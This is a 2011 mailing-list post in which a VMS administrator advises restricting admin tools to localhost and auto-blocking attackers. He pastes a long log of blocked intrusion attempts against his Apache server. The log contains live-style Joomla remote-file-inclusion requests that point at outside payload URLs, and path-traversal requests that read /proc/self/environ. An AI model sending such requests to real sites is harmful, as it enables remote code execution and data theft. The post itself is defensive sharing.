[Info-vax] 'Kill tool' released for unpatched Apache server vulnerability

VAXman- at SendSpamHere.ORG VAXman- at SendSpamHere.ORG
Thu Aug 25 09:01:03 EDT 2011 

In article <f17e991c-367e-4496-9700-cd0c4fe08bf2 at a16g2000yqd.googlegroups.com>, Neil Rieck <n.rieck at sympatico.ca> writes:
>I have got one OpenVMS box (with an Apache server) running on the
>public internet. Look what I found in my Apache error log this
>morning.
>
>[Wed Aug 24 17:00:43 2011] [error] [client 59.175.238.121] File does
>not exist: /apache$Documents/main/w00tw00t.at.blackhats.romania
>n.anti-sec:)
>[Wed Aug 24 17:00:43 2011] [error] [client 59.175.238.121] File does
>not exist: /apache$Documents/main/phpMyAdmin
>[Wed Aug 24 17:00:44 2011] [error] [client 59.175.238.121] File does
>not exist: /apache$Documents/main/phpmyadmin
>[Wed Aug 24 17:00:45 2011] [error] [client 59.175.238.121] File does
>not exist: /apache$Documents/main/pma
>[Wed Aug 24 17:00:46 2011] [error] [client 59.175.238.121] File does
>not exist: /apache$Documents/main/myadmin
>[Wed Aug 24 17:00:46 2011] [error] [client 59.175.238.121] File does
>not exist: /apache$Documents/main/MyAdmin
>
>Fortunately for us, we do not have PHP enabled on that box.

I do have PHP on OpenVMS Apache boxes.  You need to keep anything that can
be used for administrative modification from view and public accessibility.
I put such things on alternate ports ONLY served from localhost.  Thus, to
run such scripts, one has to ssh in and tunnel the port.  What you've seen
is commonplace on ANY Apache (or other) web server.  The things that are a
real issue are "script injections."  With the aid of several Apache modules
and some Apache configuration rules, I've put a chokehold on those too.  In
fact, when they are detected, the IP address is also immediately placed on
the denial list.

Here's a list of script injections I've logged just since Sunday morning.
Sunday is when I do the backup and I reset this log.  Sometimes, it takes
a couple of minutes for the IP addresses to make it way to the router's
ACL so there are multiple attempts logged.  Typically, they give up after
one or two script injection attempts.


[United States] 74.50.35.106

[21/Aug/2011:16:28:52 -0400] "GET /index.php?option=http://213.246.61.125:2082/index.html? HTTP/1.1" 400 673


2: [United States] 76.125.65.3

[21/Aug/2011:20:36:51 -0400] "GET /playlist.php?letter=http://217.218.225.2:2082/index.html? HTTP/1.1" 400 673


3: [Hungary] 79.121.103.71

[21/Aug/2011:22:00:21 -0400] "GET 
/index.php?option=com_frontpage&Itemid=1%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fauralmoon.com%2Findex.php%3Foption%3Dcom_frontpage%26amp%3BItemid%3D1','46','2','%22index.php%3Foption%3Dcom_frontpage%22+%22Itemid%3D1%22','',%20'00dc078b1234d2bcc295a0


4: [New Zealand] 123.100.101.132

[21/Aug/2011:22:40:47 -0400] "GET 
//common/db.php?commonpath=http://host04.comsatshosting.com:2121//accounts/inc/myid.jpg??????????????? HTTP/1.1" 400 673


5: [Germany] 85.114.130.141

[17/Aug/2011:10:53:11 -0400] "GET 
/index.php?option=com_content&task=section&id=1&Itemid=2//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yuken.fileave.com/id1.txt??x 
HTTP/1.1" 400 673
[17/Aug/2011:10:53:11 -0400] "GET 
//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yuken.fileave.com/id1.txt??x 
HTTP/1.1" 400 673
[22/Aug/2011:11:59:11 -0400] "GET 
/index.php?option=com_frontpage&Itemid=1&limit=7&limitstart=35//?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yuken.fileave.com/id1.txt??x 
HTTP/1.1" 400 673
[22/Aug/2011:11:59:11 -0400] "GET 
//?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yuken.fileave.com/id1.txt??x 
HTTP/1.1" 400 673


6: [Germany] 85.114.130.141

[17/Aug/2011:10:53:11 -0400] "GET 
/index.php?option=com_content&task=section&id=1&Itemid=2//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yuken.fileave.com/id1.txt??x 
HTTP/1.1" 400 673
[17/Aug/2011:10:53:11 -0400] "GET 
//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yuken.fileave.com/id1.txt??x 
HTTP/1.1" 400 673
[22/Aug/2011:11:59:11 -0400] "GET 
/index.php?option=com_frontpage&Itemid=1&limit=7&limitstart=35//?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yuken.fileave.com/id1.txt??x 
HTTP/1.1" 400 673
[22/Aug/2011:11:59:11 -0400] "GET 
//?_REQUEST=&_REQUEST[option]=com_frontpage&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://yuken.fileave.com/id1.txt??x 
HTTP/1.1" 400 673


7: [United States] 24.73.159.212

[22/Aug/2011:13:23:06 -0400] "GET /index.php?option=http://210.1.60.156:2082/index.html? HTTP/1.1" 400 673


8: [Canada] 174.142.68.206

[22/Aug/2011:17:31:55 -0400] "GET 
//index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kstovoshop.ru/plugins/user/myid.jpg?? 
HTTP/1.1" 400 673


9: [Singapore] 182.50.155.246

[21/Aug/2011:00:20:09 -0400] "GET 
/index.php?option=com_wrapper&Itemid=8//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 
HTTP/1.1" 403 730
[21/Aug/2011:00:20:10 -0400] "GET 
//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 403 744
[21/Aug/2011:00:41:32 -0400] "GET 
/index.php?option=com_wrapper&Itemid=8%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fauralmoon.com%2Findex.php%3Foption%3Dcom_wrapper%26amp%3BItemid%3D8','44','6','option%2Cgcalendar+itemid%3D48','',%20'00805213678d7fd98a7f14ac0dfea27792b1ec89a074072246a0'
[22/Aug/2011:17:41:48 -0400] "GET 
/index.php?option=com_wrapper&Itemid=8%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fauralmoon.com%2Findex.php%3Foption%3Dcom_wrapper%26amp%3BItemid%3D8','40','9','option%2Cgcalendar+itemid%3D48','',%20'00eb3f7c782bbb2e96aa3369838b4c1200ddcb10a51f6812b3c6'


10: [Russian Federation] 81.176.68.176

[22/Aug/2011:17:51:46 -0400] "GET 
/index.php?option=com_wrapper&Itemid=8%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fauralmoon.com%2Findex.php%3Foption%3Dcom_wrapper%26amp%3BItemid%3D8','41','1','option%2Cgcalendar+itemid%3D48','',%20'00bb9617c8655a6c7aef9cbc97eb383231545be58c4fc1792fcc'


11: [United States] 208.82.33.230
12: [United States] 137.118.213.62

[23/Aug/2011:18:33:30 -0400] "GET /playlist.php?letter=http://210.1.60.156:2082/index.html? HTTP/1.1" 400 673


13: [Canada] 64.254.239.206

[24/Aug/2011:09:01:18 -0400] "GET 
/index.php?option=com_content&task=view&id=3045&Itemid=2//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://some.thesome.com/etc/myid.jpg? 
HTTP/1.1" 400 673


14: [United States] 65.38.162.4

[24/Aug/2011:08:58:08 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:08:59:48 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:00:10 -0400] "GET 
/index.php//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:00:10 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:02:35 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=test?? HTTP/1.1" 
200 167
[24/Aug/2011:09:02:36 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://some.thesome.com/etc/jc.jpg?? 
HTTP/1.1" 400 673


15: [Korea] 211.115.68.151

[11/Jun/2011:07:51:55 -0400] "GET /forum/archive/index.php/?prog=http://pallotti.com.br/images/ID-RFI.txt?? HTTP/1.1" 400 673
[23/Jun/2011:13:58:33 -0400] "GET 
//index.php?option=com_weblinks&mosConfig.absolute.path=http://tal.ohhappy.net/counter/documents/logon.txt?? HTTP/1.1" 400 673
[14/Aug/2011:19:38:36 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:36 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:36 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:37 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:37 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:37 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:40 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:40 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:43 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:44 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:47 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:38:47 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:02 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:02 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:05 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:05 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:05 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:06 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:06 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:06 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:06 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:39:07 -0400] "GET 
/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[14/Aug/2011:19:52:18 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=test?? 
HTTP/1.1" 200 167
[14/Aug/2011:19:52:20 -0400] "GET 
/index.php?option=com_frontpage&amp;amp;amp;amp;amp;amp;amp;amp;Itemid=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://some.thesome.com/etc/jc.jpg?? 
HTTP/1.1" 400 673
[24/Aug/2011:08:59:13 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:08:59:48 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:08:59:50 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:08:59:54 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:00:03 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:00:35 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:00:54 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:01:08 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:01:09 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:01:11 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:01:13 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:01:14 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:01:16 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:01:18 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:01:24 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:01:28 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:07:08 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=test?? HTTP/1.1" 
200 167
[24/Aug/2011:09:07:09 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://some.thesome.com/etc/jc.jpg?? 
HTTP/1.1" 400 673


16: [United States] 206.214.217.54

[24/Aug/2011:09:13:16 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:15:50 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../..//proc/self/environ%0000 
HTTP/1.1" 200 167
[24/Aug/2011:09:24:17 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=test?? HTTP/1.1" 
200 167
[24/Aug/2011:09:24:18 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://some.thesome.com/etc/jc.jpg?? 
HTTP/1.1" 400 673


17: [United Kingdom] 213.40.79.217

[24/Aug/2011:10:52:21 -0400] "GET //common/db.php?commonpath=test?? HTTP/1.1" 400 673


18: [Korea] 58.149.248.232

[24/Aug/2011:15:34:50 -0400] "GET 
//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://some.thesome.com/etc/jc.jpg?? 
HTTP/1.1" 400 673


19: [United States] 72.3.233.173

[25/Aug/2011:08:39:19 -0400] "GET 
/index.php?option=com_frontpage&Itemid=1%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fauralmoon.com%2Findex.php%3Foption%3Dcom_frontpage%26amp%3BItemid%3D1','52','8','%22%2Findex.php%3Foption%3Dcom_frontpage%22','',%20'00e139f671c55c88e26ff3bd112a28413ca6
[25/Aug/2011:08:39:19 -0400] "GET 
//index.php?option=com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.exitrealtyfusion.com/libraries/joomla/application/idx.txt? 
HTTP/1.1" 400 673


20: [United States] 72.3.233.173

[25/Aug/2011:08:39:19 -0400] "GET 
/index.php?option=com_frontpage&Itemid=1%22%20onmousedown=%22ct(this,%20'http%3A%2F%2Fauralmoon.com%2Findex.php%3Foption%3Dcom_frontpage%26amp%3BItemid%3D1','52','8','%22%2Findex.php%3Foption%3Dcom_frontpage%22','',%20'00e139f671c55c88e26ff3bd112a28413ca6
[25/Aug/2011:08:39:19 -0400] "GET 
//index.php?option=com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.exitrealtyfusion.com/libraries/joomla/application/idx.txt? 
HTTP/1.1" 400 673


-- 
VAXman- A Bored Certified VMS Kernel Mode Hacker    VAXman(at)TMESIS(dot)ORG

All your spirit rack abuses, come to haunt you back by day.
All your Byzantine excuses, given time, given you away.

More information about the Info-vax mailing list